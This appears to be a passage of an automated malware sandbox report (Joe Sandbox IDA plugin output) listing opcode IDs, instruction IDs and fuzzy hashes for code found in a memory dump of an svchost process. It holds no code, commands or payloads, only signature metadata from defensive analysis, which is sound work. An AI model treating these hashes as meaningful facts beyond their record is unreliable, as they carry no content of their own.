                                                                                                                      • Opcode ID: 549a734c7aca339a026f4081d4679a061ad7c8079113ae7c34a8ef9970fd533a
                                                                                                                      • Instruction ID: afb371eb0c483e684b0f88dca3d4ff50428a683ee1becaaf0a8176b489b36383
                                                                                                                      • Opcode Fuzzy Hash: 549a734c7aca339a026f4081d4679a061ad7c8079113ae7c34a8ef9970fd533a
                                                                                                                      • Instruction Fuzzy Hash: E901AC39702614DBC71CEB65DC10AEEBBF9EF84510F198029D901AB640EE70DD05C7A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                      • Instruction ID: 6d5e3b6d65873a0889f05e848c35bdd7f581137b2a07bb5637e70c09f8125d5b
                                                                                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                      • Instruction Fuzzy Hash: BF015AB22026809FD322E71DC948F7AB7ECEB85750F0D04B1E955CB691D768DD80C625
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7f65fed2f06e1a63e60f82972e098ba952d3b76e4e562d3ba0f114ba083771ef
                                                                                                                      • Instruction ID: cce3d9ca05a610e52f8196f7565e8fa3fea90423496ef77c3d6bd6c6fc65d466
                                                                                                                      • Opcode Fuzzy Hash: 7f65fed2f06e1a63e60f82972e098ba952d3b76e4e562d3ba0f114ba083771ef
                                                                                                                      • Instruction Fuzzy Hash: 82018F75A11358EFDB14EFA9D815FAFBBB8EF84700F044066B500EB280D6B4DA00C7A8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3f0a07a01ed6f2d7d99bf6e1d84ac48da0e4b69f9ef7478c789d606e0e5f5c41
                                                                                                                      • Instruction ID: bef3b80f99b5745d20919d0a6311916528ae987fc7e86f188dff497a8fcc793c
                                                                                                                      • Opcode Fuzzy Hash: 3f0a07a01ed6f2d7d99bf6e1d84ac48da0e4b69f9ef7478c789d606e0e5f5c41
                                                                                                                      • Instruction Fuzzy Hash: 0A116D78D10249EBCB04DFA9D440ADEB7B4EF18304F14809AA814EB380D774DA02CBA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                      • Instruction ID: 59f4ff0c9f87ed07675c224ba35591f70f115df5f730eb3a04e489f97b7c37c4
                                                                                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                      • Instruction Fuzzy Hash: F3F0FC772477329BE732D6594880FAFAD958FC5AA4F190435E1099F604CA648C0157D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cb343b8e482b53be4fd76cce855125b7be222d3f14adb317818f36b703beab5d
                                                                                                                      • Instruction ID: d11ce9aef681b487fb21c051a4f5b55fb964ea0c90cdddbd86d2362eb5c5706f
                                                                                                                      • Opcode Fuzzy Hash: cb343b8e482b53be4fd76cce855125b7be222d3f14adb317818f36b703beab5d
                                                                                                                      • Instruction Fuzzy Hash: CA012CB5A11309ABDB04DFA9D9419EEB7B8EF89300F10405AF901EB381D774AA018BA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                      • Instruction ID: cc43cb3154f71d1e6f2bdd7ff1398e9460c478ce5eda78982ca718238d443fc4
                                                                                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                      • Instruction Fuzzy Hash: C8F0C2B3A01610ABD324CF4DDC40E57F7EAEBC4A80F088128A905CB220EA31DD04CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bb6d4db433b1646cf384fcda26c9526588ebec4e0a0c5db84052eefd00053e88
                                                                                                                      • Instruction ID: 10f9d5e46b2e529df68282ae1722b260dfc24bf6cf3579c92d99a7e682bd27fe
                                                                                                                      • Opcode Fuzzy Hash: bb6d4db433b1646cf384fcda26c9526588ebec4e0a0c5db84052eefd00053e88
                                                                                                                      • Instruction Fuzzy Hash: 9E012CB5A01309ABDB04DFA9E9419EEB7B8EF49340F50405AE500FB380D774AA018BA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                      • Instruction ID: adfb5b3588a932879a5cec8b155840dd868c75d37ec735336d5c56fddd72899e
                                                                                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                      • Instruction Fuzzy Hash: 1AF0FF72A02214AFE319CF5CDC40F6AF7EDEB4A650F094079D500DB230E671DE04CA94
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1dfff5c3646b02d5b824c4f9af3549c17a62768717113e0ef1d9ab56a7dad6e2
                                                                                                                      • Instruction ID: 3d53f4ee16486f500ccff573bf0823ecb3e84c629b35dfbcae7ebf0cb6d6b5d2
                                                                                                                      • Opcode Fuzzy Hash: 1dfff5c3646b02d5b824c4f9af3549c17a62768717113e0ef1d9ab56a7dad6e2
                                                                                                                      • Instruction Fuzzy Hash: 230140B4E0130AAFCB44DFA9D441A9EB7F4EF48300F008069A845EB340E674DA00DB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b5e76bcc7f9e567c4c1d274ef0f6e1f3fa44316211ce0b756f0bda725499a3a2
                                                                                                                      • Instruction ID: 263e8da1ad9592bd64b271e8a57b8d3b919d9440666ffdbbf90b9a2bed824518
                                                                                                                      • Opcode Fuzzy Hash: b5e76bcc7f9e567c4c1d274ef0f6e1f3fa44316211ce0b756f0bda725499a3a2
                                                                                                                      • Instruction Fuzzy Hash: 1FF0C876F11348AFDB04DFB9D805AEEB7B8EF44710F0080A6E511EB280DA74DA0187A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8b252175d8b0a144cf94d033a5b3513a91e8cdd30245a9426e9cf214a076f25e
                                                                                                                      • Instruction ID: 42a0ca6909936b9e4308f5317bbb871f7f0f7d983928843e4c974124cecec4e4
                                                                                                                      • Opcode Fuzzy Hash: 8b252175d8b0a144cf94d033a5b3513a91e8cdd30245a9426e9cf214a076f25e
                                                                                                                      • Instruction Fuzzy Hash: BA018F71E01258EBDB04DFA9D841AEEB7F8EF48310F14405AE500AB280D774EA01CBA9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                      • Instruction ID: f7d93b6cb25a0c21da6287b38fcba62b72b74eb5f97eed6bf81ab97da0e55fe6
                                                                                                                      • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                      • Instruction Fuzzy Hash: C1F0F675A033566BEB60D7AA8940FEFB7E89FC4B14F088595B902DB148DA30E940C750
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: abf1a6737236f807052f57ecb8dffb4c52b7f17a61743ba99d49db3a05657017
                                                                                                                      • Instruction ID: cb40c2433f81f9b1ea582ccec128afc7f8f9e9b5fb44bb6609a7e960a14c6cfb
                                                                                                                      • Opcode Fuzzy Hash: abf1a6737236f807052f57ecb8dffb4c52b7f17a61743ba99d49db3a05657017
                                                                                                                      • Instruction Fuzzy Hash: 65015E74E01209DFDB08DFA9D441B9EF7F4FF08300F0482A5A519EB381E6749A408B91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3980b5c9bd7f5ea0dac0c3fce4e2e332af85e5cd3c5196c59d29ca91d3260367
                                                                                                                      • Instruction ID: a6341fcffd916a589a82075829e1d3ab5a58711b5c8b228f5057f2aa74090240
                                                                                                                      • Opcode Fuzzy Hash: 3980b5c9bd7f5ea0dac0c3fce4e2e332af85e5cd3c5196c59d29ca91d3260367
                                                                                                                      • Instruction Fuzzy Hash: 6DF02B712063645FF350D65DDC02B6636D9DBC1651F298066EB098F2C0EAB5DC018394
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                      • Instruction ID: bdc0c085d894e4de6cd8d349b1d432cb67bc62d3f9c9c8f0350121f124ed0b42
                                                                                                                      • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                      • Instruction Fuzzy Hash: 2DF04FBA940304BFE711EBA4CD41FDA77FCEB44710F100566AA26DA1D0EAB0AA44CB94
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                      • Instruction ID: d40c4dbb6c2f65014946735eb2fdf96e0288a635e3d26035281a78ca9f1d457a
                                                                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                      • Instruction Fuzzy Hash: EFF05435743B1247D7B5EA6F9850B6FE2D59FC0950B49052C9455DBA40DF70D8018794
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0e3ff0c63bda8ed1a1212ffb4d86cd5dafc584107f2ffda99cb2c8bb7b8136cc
                                                                                                                      • Instruction ID: e6a838d9a1bf72f0bd787e50e33c07b57496000ecd1cd2efc69eba3c31245e8a
                                                                                                                      • Opcode Fuzzy Hash: 0e3ff0c63bda8ed1a1212ffb4d86cd5dafc584107f2ffda99cb2c8bb7b8136cc
                                                                                                                      • Instruction Fuzzy Hash: 0CF0A9B5E02308EFCB04EFA9D505A9EB7F4EF48300F4080A9B945EB381E674EA00CB54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 047bccebddf8e2629fda389614bc16f36046766dca3a06c01e05deff0b429347
                                                                                                                      • Instruction ID: e36dbbadf5050acc0c97133b4cab1a7d2c92c134a9d33d1f6ff25d08443cd6f5
                                                                                                                      • Opcode Fuzzy Hash: 047bccebddf8e2629fda389614bc16f36046766dca3a06c01e05deff0b429347
                                                                                                                      • Instruction Fuzzy Hash: 67F0FA32200344ABC731EB09CC04F9ABBEDEFC8B10F080169A94283090C7A0A918C764
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bc4bd3ca4ebd8fcdff5c669ed6bea37f5ce7191f8d80dc32ab14c5c1981b38d8
                                                                                                                      • Instruction ID: c57488a96275124413a0a01d2fbbaa4c2c3128f3e17665867c1262536d1d1084
                                                                                                                      • Opcode Fuzzy Hash: bc4bd3ca4ebd8fcdff5c669ed6bea37f5ce7191f8d80dc32ab14c5c1981b38d8
                                                                                                                      • Instruction Fuzzy Hash: 82F0673D9176E49FD7A2CB6AC444B69B7DCDB02A60F0C89AAD4898F541C764D881CA50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4b01601a79e37ce7f5baa38a5350093756f74453d657efbcec117d932a4c41b1
                                                                                                                      • Instruction ID: cc26e844358e936e3ce9f77ab498a21f16e90a3976e942324df89d673cbe8747
                                                                                                                      • Opcode Fuzzy Hash: 4b01601a79e37ce7f5baa38a5350093756f74453d657efbcec117d932a4c41b1
                                                                                                                      • Instruction Fuzzy Hash: 6FE0C232201654ABC321FB5DDD00F8A739EEFE5360F004121F1508F6D0CA60AD50C794
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                      • Instruction ID: ce2c182f77b530b7b6e2dc9b619333bdf9d32380591e63e8e98fa9fc527b68db
                                                                                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                      • Instruction Fuzzy Hash: 37D0123631717097CB29E6556954FA7AD559BC1AA4F1A006D780AD7900CD158C82D7E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                      • Instruction ID: c530bb5384036566a0fbb9745759b70f6ac68750a5212e3938a971e8da9f4551
                                                                                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                      • Instruction Fuzzy Hash: 44D09275213A80CFD65ACB09C6A4B16B3A8BB44A44F8508A0E501CBB61D668EA40CA00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                      • Instruction ID: d27fdccbe3c581967e9916bc78d8a77ac6236bb6f24a5687e3689a96b69bc48b
                                                                                                                      • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                      • Instruction Fuzzy Hash: 26D05E35946AC4CFE727CB08C165B907BF8F705F40F890098E04247BA2C37C9984CB14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction ID: 1e344e277649e2742a0fc3f0db720c4b73b7aa931c2458dee4bdbffd149abae2
                                                                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction Fuzzy Hash: 1BC0123A290648AFC712EA98CD01F427BA9EB98B40F004061F2048B670C631E920EA84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                      • Instruction ID: 7da3143d76b8e57cea0eda7d19a875d6db70669ad9ac53a821a87734cf0ad205
                                                                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                      • Instruction Fuzzy Hash: ECD01236100248EFCB01DF41C890DDE772AFBD8710F148419FD190B6108A31ED62DA50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction ID: ddbe01832254e42a93da901c489723a8ecf6b41655a20a43893028b1903eaa63
                                                                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction Fuzzy Hash: C2C04C797026418FCF15DB19D294F4577E4F744740F1518D0E945CB721E624E911CA10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                                                                      • Instruction ID: 01ba5f7c146adeb67287544d76bdd6a3efb55f0173ed54f7b3041f7c1017800d
                                                                                                                      • Opcode Fuzzy Hash: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                                                                      • Instruction Fuzzy Hash: EB90023160680412A140B25888C4586404697E0301B95C011E0824558C8B148A565361
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7b3f0529ec851a99ecfd003f5960d117bb6afb1f7af1d1997f8089d41794a367
                                                                                                                      • Instruction ID: e0bd43d44e986bd36e8a90078e1262f2de595ab0de44d2c14464fbc3aaa9cc2e
                                                                                                                      • Opcode Fuzzy Hash: 7b3f0529ec851a99ecfd003f5960d117bb6afb1f7af1d1997f8089d41794a367
                                                                                                                      • Instruction Fuzzy Hash: 8F90022120284842E140B3588844B4F414687E1302FD5C019A4556558CCA1589555721
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 67fbe63d28bea02e68ff0c88be21d5f291f7e993902b9c70c5cc8bb9024d3e12
                                                                                                                      • Instruction ID: ebf75311d4cc6e8be332e1bff245d77dc34c9d21d86c180ee46c09a6e422404c
                                                                                                                      • Opcode Fuzzy Hash: 67fbe63d28bea02e68ff0c88be21d5f291f7e993902b9c70c5cc8bb9024d3e12
                                                                                                                      • Instruction Fuzzy Hash: 5F90022124240C02E140B258C4547470047C7D0701F95C011A0424558D87168A6566B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                                                                      • Instruction ID: 31c4487d3d9f160c0566974e884df66fb97e06aef162cd4979ea005641b483ea
                                                                                                                      • Opcode Fuzzy Hash: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                                                                      • Instruction Fuzzy Hash: 3C900261602504425140B2588844446604697E13013D5C115A0954564C871889559269
                                                                                                                      Memory Dump Source
